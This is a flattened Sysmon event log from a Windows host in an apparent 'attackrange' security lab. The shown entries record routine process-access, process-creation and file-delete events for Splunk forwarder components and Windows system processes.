21:50:40.701{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81B0-613A-9796-03000000C801}4176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.701{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.701{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.701{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.701{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.701{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-81B0-613A-9796-03000000C801}4176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.701{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81B0-613A-9796-03000000C801}4176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.687{B81B27B7-81B0-613A-9796-03000000C801}4176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.529{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7AC4C8CA40AB298D279CBDB335B4C5AC,SHA256=8C61FC8F558A2384201E6AD89D3B4FA4D9B592F990E7B4C97BABB2D07AB0763A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:40.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8732A7A90ABAC07D2EE4C405406DAFF2,SHA256=5614559FA227DF591FCE891278FE9E99D9A482386B822245764A4D951A6F0F62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.916{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81B1-613A-9996-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.916{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.916{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.916{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.916{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.916{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-81B1-613A-9996-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.916{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81B1-613A-9996-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.901{B81B27B7-81B1-613A-9996-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.732{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=94EB05E5ECB3AE2DB19B719093FDCD00,SHA256=3AE2A57AD64E0DA580DF69D6F527359229C6F30CCFEAE3154D7143BA3853767C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.732{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A1524CA25A49CA1117F2C2665DA9E65F,SHA256=43F7B1888B8F6E49DCD4E7A57E5CB74D62A8FA0C0413B3D816ED3A3F2D6262CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.469{B81B27B7-81B1-613A-9896-03000000C801}45161328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.300{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81B1-613A-9896-03000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.300{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.300{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.300{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.300{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-81B1-613A-9896-03000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.300{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.300{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81B1-613A-9896-03000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.286{B81B27B7-81B1-613A-9896-03000000C801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:41.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CAB3AC46359D9ADC4A762919BF905C6,SHA256=F4002505FC9BEBD6D4A6E40D81937B7DD34A6CEA458E53FA705E44147C864F27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:42.100{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7508816F93754532FBC627279FADD6AE,SHA256=3D3FC78A1837C3634D7D367F3FFD981BA04B4917ECE8C7388DA5BB282E3E5EBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:43.115{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 